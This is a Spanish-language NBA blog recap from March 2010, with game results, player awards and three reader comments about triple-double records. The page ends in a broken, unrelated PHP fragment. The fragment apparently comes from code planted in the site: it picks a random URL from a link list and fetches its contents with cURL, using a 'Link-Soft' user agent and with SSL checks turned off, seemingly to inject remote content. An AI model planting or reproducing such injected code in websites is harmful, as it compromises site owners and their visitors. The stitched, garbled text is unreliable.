La Crónica (16/03/2010)

17 de March de 2010 por TheDeerHunter

152 puntazos le endosaron los Suns a los Wolves, 79 sólo en la primera parte, 8 tíos en dobles figuras, casi 40 puntos de diferencia a los rivales, 98 lanzamientos a canasta con un 60%, 15 triples, 37 asistencias. Un partido impecable ofensivamente más allá de las valoraciones a la defensa de Minnesotta que podamos hacer. Toda una oda al espectáculo y al arte baloncestístico pero que curiosamente siempre se pone bajo sospecha.

Pocas sospechas hay, sin embargo, de lo que suele dar de sí King James. Cuarto triple doble de la temporada. El 28º en el total de su carrera, que le coloca en el podio de los jugadores activos dentro de este apartado. Él sólo firmó la mitad de las asistencias de todos los Pistons juntos. Los de Detroit no están ahora mismo para estas guerras.

A LeBron en versión “mini” lo podemos en Sacramento. Tyreke Evans rozó otro triple doble contra los Lakers. No tenía a los Pistons enfrente, sin embargo, sinó a Kobe, Gasol y Bynum que sumaron 79 puntitos entre los tres. Odom siguió a buen nivel y Artest, muy errático, contribuyó con su excelente defensa a marcar los mejores parciales en su presencia.

En esta ocasión Wade no fue suficiente para parar a los Spurs. Ginobili parece haber recuperado la forma definitivamente y será un arma peligrosísima en la postemporada. Por su parte, los Nuggets dieron buena cuenta de los Wizards en los que sólo funcionaron Blatche, Al Thorton y un tal Alonzo Gee. Menos problemas tuvieron los Hawks en su partido trámite ante los Nets sin Harris. Los Bobcats, sin embargo, tropezaron imperdonablemente contra los Pacers en un extraño partido en el que las pérdidas y la línea de tres les condenó a la derrota.

Por último, Marc se perdió el primer partido que le recordamos. Su equipo, no obstante, logró tapar su hueco con la interminable sombra de Thabeet. Los Bulls ahora mismo no son rival ni para ellos ni para nadie.

PREMIOS

MVP: Lebron “The King” James sumó un triple doble más a su carrera con 29 puntos, 12 rebotes y 12 asistencias. Sólo le hacen sombra, y muy de lejos, Pau Gasol con 28 puntos (12 de 14), 12 rebotes y 4 asistencias, Carmelo Anthony, 29-12 y Kobe Bryant, 30-9-7.

Rookie: Como Tyreke Evans está a otro nivel, destacamos a Jonas Jebreko, muy sólido en Detroit (10 puntos, 5 rebotes, 3 asistencias y 3 robos), Terrence Williams (15-6-4)

Sorpresa: En la vorágine anotadora de los Suns, ha pescado bastante Louis Admuson con 20 puntos y 7 rebotes. Mike Conley cuajó posiblemente el mejor partido de la temporada frente a los Bulls a los que endosó 19 puntos, 10 asistencias y 5 robos. Y lo de Acie Law saliendo de titular con los Bulls y anotando 18 puntos seguro que tampoco se lo esperaba nadie.

Decepción: El periplo de Ben Gordon en los Pistons está resultando de los más decepcionante. Ayer sólo fue capaz de anotar uno de sus seis intentos para acabar el partido con 4 puntos.

Esfuerzo en vano: El discípulo más joven y más aventajado del rey se queda a un pasito del triple doble. Tyreke Evans consiguió 25 puntos, 11 rebotes y 9 asistencias pero esta vez los Kings perdieron.

Comenta

3 comentarios a esta entrada

  1. Love Denise dice:
    #1

    que gusto da ver como un equipo es capaz de anotar 152 puntos en un partido.
    Alguien piensa que James podría acercarse o superar a los 104 triples-dobles actuales de Kidd? Al angelito todavía le quedan como 10 años de NBA, aunque está claro que con 36 no tendrá el físico actual.
    Buenos minutitos hoy los de Thabeet (10p, 9 rb, 2 tap), esperemos que despierte y que el año que viene se convierta en un buen pivot defensor, lo peor para él, es que va a tener a Marc delante.

      Citar

  2. sayim dice:
    #2

    A mi cuando un equipo mete 152 (sin ver el partido) me da la impresión que se defendió menos que en el All Star.
    Yo sigo pensando que Thabeet va a hacer carrera en la liga, además ayer controlando las faltas… Si aprende cuatro cosas, tiene una capacidad reboteadora y de intimidación como hay pocas en la liga (sacado el mejor pivot de la nba, ese que juega en Wisconsin )
    Yo creo que a Lebron no le dará para superar a Kidd: Le quedan casi 80 (espero que Kidd nos deleite con alguno más, aunque no llegue a la brutalidad de hace un par de semanas) y no creo que pueda seguir aumentando sus números durante muchos años más, por lo que necesitaría hacer entre 8 y 10 de media cada año, muchos me parecen…
    Me pregunto cuanto tardará en salir alguien que sea capaz de superar los 181 de Oscar Robertson. Tal vez si explota el alero más completo de la liga, ese que juega en Wisconsin…

      Citar

  3. Love Denise dice:
    #3

    creo que conseguir 181 triples dobles en el baloncesto actual es imposible, salvo que salga un tío de 2’40 con la movilidad de un ala-pivot y sin problemas fícos y de espaldas, cosa improbable por la naturaleza de la que está compuestoa el cuerpo humano. muchísimo mérito tienen todos aquellos que pasen de 100

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>